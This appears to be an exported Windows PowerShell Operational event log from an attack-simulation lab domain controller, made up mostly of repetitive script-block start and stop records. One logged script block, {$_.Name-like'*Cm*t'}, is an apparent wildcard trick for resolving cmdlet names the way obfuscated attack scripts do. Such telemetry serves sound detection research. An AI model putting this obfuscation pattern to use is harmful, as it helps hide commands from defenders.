SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475880
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475879
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475878
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475877
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475876
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475875
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475874
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475873
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475872
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475871
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475870
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475869
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475868
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475867
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475866
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475865
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475864
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475863
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475862
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475861
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475860
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475859
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475858
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475857
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475856
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475855
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475854
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475853
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475852
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475851
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475850
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475849
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475848
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475847
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475846
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475845
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475844
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475843
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1475842
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{$_.Name-like'*Cm*t'}

ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Path:
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475841
Keywords=None
Message=Completed invocation of ScriptBlock ID: 036040b7-ec09-44f6-9eab-859b33f8c77f
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475840
Keywords=None
Message=Started invocation of ScriptBlock ID: 036040b7-ec09-44f6-9eab-859b33f8c77f
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475839
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89ebd1bb-8d1f-4a8b-aaa6-51de65f8ffff
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475838
Keywords=None
Message=Started invocation of ScriptBlock ID: 89ebd1bb-8d1f-4a8b-aaa6-51de65f8ffff
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475837
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475836
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475835
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475834
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475833
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475832
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475831
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475830
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475829
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475828
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475827
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475826
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
